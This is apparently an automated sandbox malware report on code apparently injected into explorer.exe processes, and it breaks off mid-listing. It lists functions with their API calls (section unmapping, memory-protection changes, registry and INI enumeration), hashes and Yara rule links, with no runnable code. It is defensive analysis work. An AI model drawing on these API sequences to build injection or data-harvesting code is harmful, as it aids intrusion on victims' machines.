Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: d45251f7e4e11210f7fffebcae0471bc232093d8ba7ac43177382a2f78b4d9b1
Instruction ID: 0a3ae498f7b1e004331fbf5c2429b0fcb6aaa4d44dc4e01159baf388a83a3508
Opcode Fuzzy Hash: d45251f7e4e11210f7fffebcae0471bc232093d8ba7ac43177382a2f78b4d9b1
Instruction Fuzzy Hash: 44E1D27060E3C28FD725CE2AC4947AABBE3AF99344F28485DF8C187392D664CD45D752

Function 006E70C9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 403COMMON

Download Yara Rule

APIs

_aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 006E720E
_aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 006E7226
_aulldvrm.NTDLL(00000000,00000000,?), ref: 006E727B

Strings

-x0, xrefs: 006E7325
NaN, xrefs: 006E73F8

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: _aulldvrm$_aullrem
String ID: -x0$NaN
API String ID: 105165338-3447725786
Opcode ID: 26a3c32dbdc3bf5ca0186639702df42e3e0397dd5d38bf43a681bdb4330e0c32
Instruction ID: 5de6043152ac445912972d00c0a2601c39305e44b89628c80f96526544a2800d
Opcode Fuzzy Hash: 26a3c32dbdc3bf5ca0186639702df42e3e0397dd5d38bf43a681bdb4330e0c32
Instruction Fuzzy Hash: E9D1F47060E3C28FD7258E2AC4947AABBE3AFA5344F28485DF8C187392D664CD45D742

Function 006E898F Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 353COMMON

Download Yara Rule

APIs

_allmul.NTDLL(00000000,?,0000000A,00000000), ref: 006E8AAD
_allmul.NTDLL(?,?,0000000A,00000000), ref: 006E8B66
_allmul.NTDLL(?,00000000,0000000A,00000000), ref: 006E8C9B
_alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 006E8CAE

Strings

., xrefs: 006E8B17

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: _allmul$_alldvrm
String ID: .
API String ID: 115548886-248832578
Opcode ID: d0096dd7927318e70d37c691224f100c3d57abef69ec672af2e28d46aa5e6ea4
Instruction ID: 271557b205cf58782f8147abb36fa26cd1b9d26a0f980efba27c897382b68d53
Opcode Fuzzy Hash: d0096dd7927318e70d37c691224f100c3d57abef69ec672af2e28d46aa5e6ea4
Instruction Fuzzy Hash: E7D116B194E7C58FC7108F4A888027ABBF2BFA5714F14096EF5CD87391DBB588458B86

Function 0070D684 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0070D6A0
memset.NTDLL ref: 0070D6B3
memset.NTDLL ref: 0070D6C3

Strings

9, xrefs: 0070D701
,, xrefs: 0070D6FC
7, xrefs: 0070D71B

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: memset
String ID: ,$7$9
API String ID: 2221118986-1653249994
Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
Instruction ID: 9e6d0a6c7f656cc0ec089b661694e04b9f4b90ae744644717aba5b3470ac1f29
Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
Instruction Fuzzy Hash: 9E316D71508344DFD371DF60D444B8FBBE9AF85340F008A2EF98997292EB75A548CB92

Function 006E1BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,?,006E2E75,PathToExe,00000000,00000000), ref: 006E1BCC
StrStrIW.SHLWAPI(00000000,.exe,?,006E2E75,PathToExe,00000000,00000000), ref: 006E1BF0
StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,006E2E75,PathToExe,00000000,00000000), ref: 006E1C05
lstrlenW.KERNEL32(00000000,?,006E2E75,PathToExe,00000000,00000000), ref: 006E1C1C

Strings

.exe, xrefs: 006E1BEA

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: lstrlen
String ID: .exe
API String ID: 1659193697-4119554291
Opcode ID: c2f8d77deeaa6f66219e4116a28f3009108667f9f900c31dfb0baba550bc1303
Instruction ID: eaa97039e74618620fb3ae84d847e69d14feb200a9172dc65ca78756e4066103
Opcode Fuzzy Hash: c2f8d77deeaa6f66219e4116a28f3009108667f9f900c31dfb0baba550bc1303
Instruction Fuzzy Hash: 21F0C8303563606AE3245F369C45AFB62A6EF02742720882DE141C7261F7788C41D76D

Function 006E2112 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29timeCOMMON

Download Yara Rule

APIs

Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A

GetSystemTimeAsFileTime.KERNEL32(?), ref: 006E2127
_alldiv.NTDLL(?,?,00989680,00000000), ref: 006E213A
wsprintfA.USER32 ref: 006E214F

Strings

%li, xrefs: 006E2149

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
String ID: %li
API String ID: 4120667308-1021419598
Opcode ID: 24d888892659d4e480a08512ce0bcd5c99013c464f5b20dffcb77bfec545b31c
Instruction ID: e367a52e8551f95f7f6cf7bc79e3f5d8328f7f504042c7cdd28f9c75c6ce01c8
Opcode Fuzzy Hash: 24d888892659d4e480a08512ce0bcd5c99013c464f5b20dffcb77bfec545b31c
Instruction Fuzzy Hash: 61E0D83264121877E7213BB89C0AEEF7B6DDB40B16F008195F900E6182E9764A2493D9

Function 006F2FF6 Relevance: 6.6, APIs: 5, Instructions: 369COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000018), ref: 006F316F
_allmul.NTDLL(-00000001,00000000,?,?), ref: 006F31D2
_alldiv.NTDLL(?,?,00000000), ref: 006F32DE
_allmul.NTDLL(00000000,?,00000000), ref: 006F32E7
_allmul.NTDLL(?,00000000,?,?), ref: 006F3392

Part of subcall function 006F16CD: memset.NTDLL ref: 006F172B

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: _allmul$_alldivmemset
String ID:
API String ID: 3880648599-0
Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
Instruction ID: c61b27933af41a1f1e882c1e1270d72312e03ef7ad613ec0fe361613c089d8a3
Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
Instruction Fuzzy Hash: 7FD18A716083998BDB24DF69C480BAEBBE2BF84704F14482DFA9587351DB70DE45CB92

Function 007187FA Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 388COMMON

Download Yara Rule

Strings

FOREIGN KEY constraint failed, xrefs: 00718AC8
old, xrefs: 0071889E
new, xrefs: 007188AA

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID:
String ID: FOREIGN KEY constraint failed$new$old
API String ID: 0-384346570
Opcode ID: b2f8f388b02534d0ac7e2004cbc00ed81dacf55feec7a66e01e28aeae32d6da6
Instruction ID: be94d498a4e5c265d9626582b8ab4a9bafa1ebcf597a4519acb008c3d427dc70
Opcode Fuzzy Hash: b2f8f388b02534d0ac7e2004cbc00ed81dacf55feec7a66e01e28aeae32d6da6
Instruction Fuzzy Hash: 26D10870608340EFD754DF29C885B6EBBE6AB88750F10891EF9458B2D1DB78D981CB93

Function 006E96BC Relevance: 6.4, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

_alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 006E96E7
_alldiv.NTDLL(00000000,80000000,?,?), ref: 006E9707
_alldiv.NTDLL(00000000,80000000,?,?), ref: 006E9739
_alldiv.NTDLL(00000001,80000000,?,?), ref: 006E976C
_allmul.NTDLL(?,?,?,?), ref: 006E9798

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: _alldiv$_allmul
String ID:
API String ID: 4215241517-0
Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
Instruction ID: 13b59e5e094e35f34b665d1f9ef9e835d769ff51c2a37035c1d54a31b5e01851
Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
Instruction Fuzzy Hash: 2C21013112B7D56AEF745D1B4CC4BAB768BCF91794F35012EE80182342E962888880B5

Function 006FB162 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000), ref: 006FB1B3
_alldvrm.NTDLL(?,?,00000000), ref: 006FB20F
_allrem.NTDLL(?,00000000,?,?), ref: 006FB28A
memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 006FB298

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: _alldvrm_allmul_allremmemcpy
String ID:
API String ID: 1484705121-0
Opcode ID: dae56c5314a831c5015b4a3968050d359503f2cb49f181186188cd21fd9efe7a
Instruction ID: ecfc0902286aeeb1989814899fe66f25cb3c4de94219880fa780afdaab21b66f
Opcode Fuzzy Hash: dae56c5314a831c5015b4a3968050d359503f2cb49f181186188cd21fd9efe7a
Instruction Fuzzy Hash: 344146756083059BC758EF25C89193EBBE6AFC8300F04992DFA9597362DB30ED05CB52

Function 006E1953 Relevance: 6.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,00000000,?,?,006E2F0C), ref: 006E1973
lstrlenW.KERNEL32(00736564,?,?,006E2F0C), ref: 006E1978
lstrcatW.KERNEL32(00000000,?,?,?,006E2F0C), ref: 006E1990
lstrcatW.KERNEL32(00000000,00736564,?,?,006E2F0C), ref: 006E1994

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: 9e8d464c00023807fb57506b3744c39e97f06f61fda0dbad0d3aa5604db0a456
Instruction ID: 564b04d0254f60a74ce15f358df6505e0a604f401099abe5f0158c8db7f33b68
Opcode Fuzzy Hash: 9e8d464c00023807fb57506b3744c39e97f06f61fda0dbad0d3aa5604db0a456
Instruction Fuzzy Hash: 76E0E5A230031C2B571477AF5C90D7B769DCACA6A13054039FA04D7302FD669C0446F4

Function 0070F21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 006E6A81: memset.NTDLL ref: 006E6A9C

_aulldiv.NTDLL(?,00000000,?,00000000), ref: 0070F2A1

Strings

%llu, xrefs: 0070F2A8
%llu, xrefs: 0070F25E

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: _aulldivmemset
String ID: %llu$%llu
API String ID: 714058258-4283164361
Opcode ID: 23ff429ac47805531b5f1e00347a2bcf06bb2db7568c8776d960ec3c5f887449
Instruction ID: 5b1738eef2529e9c40001513fb6128db140b487afd01dac03d163457c74b0afe
Opcode Fuzzy Hash: 23ff429ac47805531b5f1e00347a2bcf06bb2db7568c8776d960ec3c5f887449
Instruction Fuzzy Hash: FD2126B2A44645ABC710AA24CC42F6F7799EF80730F00433CF921976C1EB24EC1187E5

Function 006F203C Relevance: 5.3, APIs: 4, Instructions: 274COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,?), ref: 006F2174
_allmul.NTDLL(?,?,?,00000000), ref: 006F220E
_allmul.NTDLL(?,00000000,00000000,?), ref: 006F2241
_allmul.NTDLL(006E2E26,00000000,?,?), ref: 006F2295

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: _allmul
String ID:
API String ID: 4029198491-0
Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
Instruction ID: 0236e9d56a4dc0d2855ff5f5c74aafb75b78a442e250ce676d7623d598ebc704
Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
Instruction Fuzzy Hash: 09A189B170870A9BD714DE69C8A1A3EB7E7AF98740F00482CF7458B351EB71ED458B46

Function 006F78B9 Relevance: 5.2, APIs: 4, Instructions: 227COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?,?), ref: 006F7979
memset.NTDLL ref: 006F798A
memcpy.NTDLL(?,?,?), ref: 006F7A00
memset.NTDLL ref: 006F7A14

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: d20c6004f6cfed2b8eef0f9f1bb053830f00ce07d7848fba04fdd83305b0a59d
Instruction ID: 17b14551f8fa3ce0982a7f17a182967316fbace122d720edf89e1b580954f80a
Opcode Fuzzy Hash: d20c6004f6cfed2b8eef0f9f1bb053830f00ce07d7848fba04fdd83305b0a59d
Instruction Fuzzy Hash: 65818C716083589FC350DF29C881A7BBBE6FF88704F14496DF98A8B352E670E905CB91

Function 006E190B Relevance: 5.0, APIs: 4, Instructions: 36stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,?,00000000,006E2783), ref: 006E192B
lstrlen.KERNEL32(00000000,?,?,?,00000000,006E2783), ref: 006E1930
lstrcat.KERNEL32(00000000,?), ref: 006E1946
lstrcat.KERNEL32(00000000,00000000), ref: 006E194A

Memory Dump Source

Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: c02932c6bac02d8d6f9bb81c3c130fd82ad77f5b77e782da7587f57ec7f00d12
Instruction ID: 0031d2d951c1128540480d6f76cf10fe944d87c3746a9bdfb3ad9b98bf6fb214
Opcode Fuzzy Hash: c02932c6bac02d8d6f9bb81c3c130fd82ad77f5b77e782da7587f57ec7f00d12
Instruction Fuzzy Hash: FFE09B6230135C2B572177BF6C94D7B76DDCAD65A53054035F904C7303EE669C0596B4

Analysis Process: explorer.exePID: 6824, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	21.7%
Dynamic/Decrypted Code Coverage:	87.3%
Signature Coverage:	0%
Total number of Nodes:	181
Total number of Limit Nodes:	17

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00CB30A8 Relevance: 4.7, APIs: 3, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00CB3104
FindNextFileW.KERNELBASE ref: 00CB3218
FindClose.KERNELBASE ref: 00CB3229

Memory Dump Source

Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
Instruction ID: cd3e30133068fc239415bd66e3371249e6aacd25d82231720aa6b30b86d488ae
Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
Instruction Fuzzy Hash: 00416F30318B4C4FDB94FB3898597EE73E6FBD8341F444A29A45AC3191EE78DA049782

Function 00CB38B0 Relevance: 1.5, APIs: 1, Instructions: 40
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00CB38F2

Memory Dump Source

Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
Instruction ID: 2a853d751e5ae81adbf1a8f4ec092aca19b555c0b8196492deee25264f2c96bf
Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
Instruction Fuzzy Hash: 82F0E520F11A481BEF6C77FD689D3B92284EB98311F90052AB925C32D2DC3A8E458302

Function 00CB2774 Relevance: 6.1, APIs: 4, Instructions: 124
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE ref: 00CB27C7
RegQueryValueExW.KERNELBASE ref: 00CB27F4
RegQueryValueExW.KERNELBASE ref: 00CB283A
RegCloseKey.KERNELBASE ref: 00CB2860

Part of subcall function 00CB1860: RtlFreeHeap.NTDLL ref: 00CB1880

Memory Dump Source

Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd

Similarity

API ID: QueryValue$CloseFreeHeapOpen
String ID:
API String ID: 1641618270-0
Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
Instruction ID: 76458921b39179fc788f0059506b451923e869760162f0472a3e420c492e0518
Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
Instruction Fuzzy Hash: CA31C53120CB488FE769DB28D4587BA7BD0FBA8355F54062EE49AC22A4DF35C9428742

Function 00CB372C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE ref: 00CB37B2
RegCloseKey.KERNELBASE ref: 00CB37C1

Strings

?, xrefs: 00CB37A2

Memory Dump Source

Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd

Similarity

API ID: CloseCreate
String ID: ?
API String ID: 2932200918-1684325040
Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
Instruction ID: 516aff987ee5d6356bf8a7f2c00fbf37a0e460ed406e1fd2f900f50b0ffe00d9
Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
Instruction Fuzzy Hash: E1119070608B488FD751DF29D48866AB7E1FB98305F50062EE48AC3260DF389985CB82

Function 00CBA298 Relevance: 4.8, APIs: 3, Instructions: 252
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00CBA397
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00CBA441
VirtualProtect.KERNELBASE ref: 00CBA45F

Memory Dump Source

Source File: 0000000D.00000002.3101571099.0000000000CB9000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_cb9000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
Instruction ID: b93970d0dc29107a8e5d429b83dc1bbbd1fff062bac464bcfb584069b83ce673
Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
Instruction Fuzzy Hash: DB51673275891D4BCB24AB7C98C43F5B3C1F769321F58062AC4EAC3294E959D9468383

Function 00CB3254 Relevance: 4.7, APIs: 3, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CB298C: GetFileAttributesW.KERNELBASE ref: 00CB299E

GetPrivateProfileSectionNamesW.KERNEL32 ref: 00CB330F
GetPrivateProfileStringW.KERNEL32 ref: 00CB336F
GetPrivateProfileIntW.KERNEL32 ref: 00CB338C

Part of subcall function 00CB30A8: FindFirstFileW.KERNELBASE ref: 00CB3104

Part of subcall function 00CB1860: RtlFreeHeap.NTDLL ref: 00CB1880

Memory Dump Source

Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd

Similarity

API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
String ID:
API String ID: 970345848-0
Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
Instruction ID: e3f3ac39ceda46df808ea7ffd7ee7a9f9e448b01809780a81d8aaf39cb50b2d8
Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
Instruction Fuzzy Hash: A751EE30718F494FDB19B72C68166BE33D1FB98300F44056EE40AC7296EE64DE468786

Function 00CB3458 Relevance: 4.7, APIs: 3, Instructions: 172
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE ref: 00CB347E
RegOpenKeyExW.KERNELBASE ref: 00CB353F
RegEnumKeyExW.KERNELBASE ref: 00CB35D6

Part of subcall function 00CB2774: RegOpenKeyExW.KERNELBASE ref: 00CB27C7
Part of subcall function 00CB2774: RegQueryValueExW.KERNELBASE ref: 00CB27F4
Part of subcall function 00CB2774: RegQueryValueExW.KERNELBASE ref: 00CB283A
Part of subcall function 00CB2774: RegCloseKey.KERNELBASE ref: 00CB2860

Part of subcall function 00CB3254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 00CB330F

Part of subcall function 00CB1860: RtlFreeHeap.NTDLL ref: 00CB1880

Memory Dump Source

Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd

Similarity

API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
String ID:
API String ID: 1841478724-0
Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
Instruction ID: e4b67799794fa15fe01e31d62b29507cd695e07b874b9341e16211c8904e156c
Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
Instruction Fuzzy Hash: 34417C30718F4C4FDBA8EF6D94997AAB6E1FB98341F44056EA54EC32A1DE34D9048B42

Function 00CB2938 Relevance: 3.0, APIs: 2, Instructions: 34
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00CB2966
CloseHandle.KERNELBASE ref: 00CB297A

Memory Dump Source

Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
Instruction ID: bf702346a4df55701551d3b4ad994711cbd7bb84de3174160d8bff0299a5493c
Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
Instruction Fuzzy Hash: D2F02B7061570A4FE7446FB94498376B5D0FB08397F18473DE46EC62D0D73489428702

Function 00CB22B4 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE ref: 00CB22D0

Memory Dump Source

Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
Instruction ID: 4feec456ba4181d6b839b912b6121ee74de514bb34a8f94cea68afb8c8b8374e
Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
Instruction Fuzzy Hash: FAE0C230108B0A8FD758AFBCE4CA07933A1FB9C252B05053FE005CB114D27988C1C741

Function 00CB298C Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE ref: 00CB299E

Memory Dump Source

Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
Instruction ID: 3dbd09c393f715283cde4be171ecee418388c4218ac6fb4d77066ea31b502e33
Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
Instruction Fuzzy Hash: A0D0A722F32905077B6426FA08DD2F130A0D71932AF14033AEB3EC11E0E285CED5A201

Function 00CB1860 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL ref: 00CB1880

Memory Dump Source

Source File: 0000000D.00000002.3101571099.0000000000CB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_cb1000_explorer.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
Instruction ID: 0946abe1e520979cae27cdedbce2dd1f4ae0c99a73809e3a3e127034fae1c452
Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
Instruction Fuzzy Hash: F7D01224716A040BEF2CBBFA1C9D1B47AD6E758212F5D8065BC19C3291DD3AD895D341

Analysis Process: explorer.exePID: 2180, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	97.4%
Signature Coverage:	27.5%
Total number of Nodes:	306
Total number of Limit Nodes:	42

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00191016 Relevance: 89.5, APIs: 30, Strings: 21, Instructions: 244
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

